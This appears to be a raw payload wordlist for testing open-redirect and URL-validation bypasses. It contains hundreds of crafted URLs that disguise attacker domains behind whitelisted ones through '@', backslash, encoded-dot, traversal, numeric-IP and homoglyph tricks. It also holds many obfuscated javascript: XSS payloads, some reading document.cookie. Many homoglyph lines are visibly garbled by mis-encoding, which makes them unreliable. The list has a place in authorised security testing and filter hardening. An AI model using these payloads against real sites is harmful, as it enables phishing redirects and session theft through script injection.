http://www.whitelisteddomain.tld%2eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.whitelisteddomain.tld@3627734734
http:www.whitelisteddomain.tld@3627734734
http://www.whitelisteddomain.tld@472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http://www.whitelisteddomain.tld:80%40localdomain.pw/
http://www.whitelisteddomain.tld:80%40â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld+&@localdomain.pw#+@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tldâº&@localdomain.pw#âº@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tld+&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@www.whitelisteddomain.tld/
http://www.whitelisteddomain.tldâº&@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#âº@www.whitelisteddomain.tld/
http\x3A\x2F\x2Fgoogle.com
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@example.com+@google.com/
http://XY>.7d8T\205pZM@example.com@google.com/
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@traidnt.net+@bing.com/
http://XY>.7d8T\205pZM@traidnt.net@bing.com/
http://XY>.7d8T\205pZM@whitelisted.com+@google.com/
http://XY>.7d8T\205pZM@whitelisted.com@google.com/
http://XY>.7d8T\205pZM@whitelisted.com+@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@WillBeReplaced.com+@google.com/
http://XY>.7d8T\205pZM@WillBeReplaced.com@google.com/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tldâº@localdomain.pw/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld+@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
http://XY>.7d8T\205pZM@www.whitelisteddomain.tldâº@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
ja&NewLine;vascript:alert(1)
ja\nva\tscript\r:alert(1)
ja&Tab;vascript:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript:%0aalert`1`
javascript://%0aalert(1)
javascript://%0aalert`1`
javascript:%250Aalert(1)
javascript&#58;alert(1)
javascript:%61%6c%65%72%74%28%29
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascript:alert(1)//https://www.whitelisteddomain.tld
javascript:alert(1)//localdomain.pw/
javascript:alert(1)//www.whitelisteddomain.tld/
javascript:alert%60%60
javascript:alert(document.domain)//://
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:a\u006Cert``"
javascript&colon;alert()
javascript:confirm(1)
Javascript://%E2%80%A9alert(618)
javascript://example.com?%a0alert%281%29
javascript://https://example.com/?z=%0Aalert(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript://https://WillBeReplaced.com/?z=%0Aalert(1)
javascript://https://www.whitelisteddomain.tld/?z=%0Aalert(1)
javascript:new%20Function`al\ert\`1\``;
javascript:prompt(1)
javascript:\u0061\u006C\u0065\u0072\u0074``
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
javascript://WillBeReplaced.com?%a0alert%281%29
jaVAscript://www.whitelisteddomain.tld//%0d%0aalert(1);//
javascripT://www.whitelisteddomain.tld/%250d%250aalert(document.cookie)
javascript://www.whitelisteddomain.tld?%a0alert%281%29
javascript&#x0003A;alert()
javascript:x='%27-alert(1)-%27';
javascript&#x3A;alert()
java&#x73;cript:alert()
ja&#x0000A;vascript:alert(1)
//localdomain%00.pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//localdomain%E3%80%82pw
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
#//localdomain.pw
.localdomain.pw
/#//localdomain.pw
/.localdomain.pw
//.@.@localdomain.pw
/////localdomain.pw
/////localdomain.pw/
////localdomain.pw/
////localdomain.pw//
////localdomainã€‚pw
///\;@localdomain.pw
///\ï¹”@localdomain.pw
///localdomain.pw
///localdomain.pw/
///localdomain.pw//
//;@localdomain.pw
//\/localdomain.pw/
//ï¹”@localdomain.pw
//localdomain.pw
//localdomain.pw/
//localdomain.pw//
//localdomain.pw?
/?localdomain.pw
/\/localdomain.pw/
<>//localdomain.pw
?localdomain.pw
@localdomain.pw
\/\/localdomain.pw/
Â°/localdomain.pw
#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/#//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//.@.@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒã€‚ï¼°â“¦
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///\;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///\ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//;@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//ï¹”@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦?
/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
<>//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
\/\/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
Â°/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//localdomain.pw%23@www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%23@www.whitelisteddomain.tld
////localdomain.pw/%2e%2e
///localdomain.pw/%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////localdomain.pw/%2e%2e%2f
///localdomain.pw/%2e%2e%2f
//localdomain.pw/%2e%2e%2f
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////localdomain.pw/%2f..
///localdomain.pw/%2f..
//localdomain.pw/%2f..
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
//localdomain.pw/%2f%2e%2e
/localdomain.pw/%2f%2e%2e
////â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//localdomain.pw:80#@www.whitelisteddomain.tld/
//localdomain.pw:80?@www.whitelisteddomain.tld/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@www.whitelisteddomain.tld/
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@www.whitelisteddomain.tld/
//localdomain.pw%FF@www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦%FF@www.whitelisteddomain.tld
//localdomain.pw\twww.whitelisteddomain.tld/
//localdomainï½¡pw\áµ—www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twww.whitelisteddomain.tld/
//localdomain.pw\udfff@www.whitelisteddomain.tld/
//localdomain.pw/www.whitelisteddomain.tld
//localdomain.pw\@.www.whitelisteddomain.tld
//localdomain.pw\@www.whitelisteddomain.tld
//localdomain.pw\\@.www.whitelisteddomain.tld
localdomain.pw/www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@.www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@www.whitelisteddomain.tld
//â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\\@.www.whitelisteddomain.tld
â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/www.whitelisteddomain.tld
//localdomain.pwï¿½@www.whitelisteddomain.tld/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%00ï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒ%E3%80%82pw
.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///\;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
<>//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
\/\/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80#@whitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦:80?@whitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\twhitelisted.com/
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦\@whitelisted.com
â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/whitelisted.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
////traidnt.net@bing.com/
////traidnt.net@bing.com//
///traidnt.net@bing.com/
///traidnt.net@bing.com//
//traidnt.net@bing.com/
//traidnt.net@bing.com//
////traidnt.net@bing.com/%2e%2e
///traidnt.net@bing.com/%2e%2e
////traidnt.net@bing.com/%2e%2e%2f
///traidnt.net@bing.com/%2e%2e%2f
//traidnt.net@bing.com/%2e%2e%2f
////traidnt.net@bing.com/%2f..
///traidnt.net@bing.com/%2f..
//traidnt.net@bing.com/%2f..
////traidnt.net@bing.com/%2f%2e%2e
///traidnt.net@bing.com/%2f%2e%2e
//traidnt.net@bing.com/%2f%2e%2e
//traidnt.net+&@bing.com#+@traidnt.net/
//traidnt.net@https:///bing.com/%2e%2e
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com
/\victim.com:80%40google.com
/\whitelisted.com:80%40google.com
whitelisted.com@%E2%80%AE@google.com
////whitelisted.com@google.com/
////whitelisted.com@google.com//
///whitelisted.com@google.com/
///whitelisted.com@google.com//
//whitelisted.com@google.com/
//whitelisted.com@google.com//
whitelisted.com.google.com
whitelisted.com;@google.com
////whitelisted.com@google.com/%2e%2e
///whitelisted.com@google.com/%2e%2e
////whitelisted.com@google.com/%2e%2e%2f
///whitelisted.com@google.com/%2e%2e%2f
//whitelisted.com@google.com/%2e%2e%2f
////whitelisted.com@google.com/%2f..
///whitelisted.com@google.com/%2f..
//whitelisted.com@google.com/%2f..
////whitelisted.com@google.com/%2f%2e%2e
///whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com@google.com/%2f%2e%2e
//whitelisted.com+&@google.com#+@whitelisted.com/
//whitelisted.com@https:///google.com/%2e%2e
//whitelisted.com@https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
whitelisted.com;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
////whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//whitelisted.com@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/
//whitelisted.com+&@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦#+@whitelisted.com/?
////WillBeReplaced.com@google.com/
////WillBeReplaced.com@google.com//
///WillBeReplaced.com@google.com/
///WillBeReplaced.com@google.com//
//WillBeReplaced.com@google.com/
//WillBeReplaced.com@google.com//
////WillBeReplaced.com@google.com/%2e%2e
///WillBeReplaced.com@google.com/%2e%2e
////WillBeReplaced.com@google.com/%2e%2e%2f
///WillBeReplaced.com@google.com/%2e%2e%2f
//WillBeReplaced.com@google.com/%2e%2e%2f
////WillBeReplaced.com@google.com/%2f..
///WillBeReplaced.com@google.com/%2f..
//WillBeReplaced.com@google.com/%2f..
////WillBeReplaced.com@google.com/%2f%2e%2e
///WillBeReplaced.com@google.com/%2f%2e%2e
//WillBeReplaced.com@google.com/%2f%2e%2e
//WillBeReplaced.com+&@google.com#+@WillBeReplaced.com/
//WillBeReplaced.com@https:///google.com/%2e%2e
www.bing.com
//www.google.com
////www.google.com/%2e%2e
///www.google.com/%2e%2e
//www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
//www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
//www.google.com/%2f%2e%2e
///www.traidnt.net@bing.com/
www.whitelisteddomain.tld%09.localdomain.pw
www.whitelisteddomain.tld%09.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
www.whitelisteddomain.tld%09ï½¡â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//www.whitelisteddomain.tld/../..%20.localdomain.pw
//www.whitelisteddomain.tld/../..%20.â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/?
www.whitelisteddomain.tld%252elocaldomain.pw
www.whitelisteddomain.tld%252eâ“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////www.whitelisteddomain.tld@google.com/
////www.whitelisteddomain.tld@google.com//
///www.whitelisteddomain.tld@google.com/
///www.whitelisteddomain.tld@google.com//
//www.whitelisteddomain.tld@google.com/
//www.whitelisteddomain.tld@google.com//
////www.whitelisteddomain.tld@google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
//www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e
//www.whitelisteddomain.tld@https:///â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/
////www.whitelisteddomain.tld@localdomain.pw//
///www.whitelisteddomain.tld@localdomain.pw/
///www.whitelisteddomain.tld@localdomain.pw//
//www.whitelisteddomain.tld@localdomain.pw/
//www.whitelisteddomain.tld@localdomain.pw//
www.whitelisteddomain.tld;@localdomain.pw
www.whitelisteddomain.tldï¹”@localdomain.pw
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
////www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
///www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
//www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
//www.whitelisteddomain.tld@â“ğ¨ğ—°ğ€ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
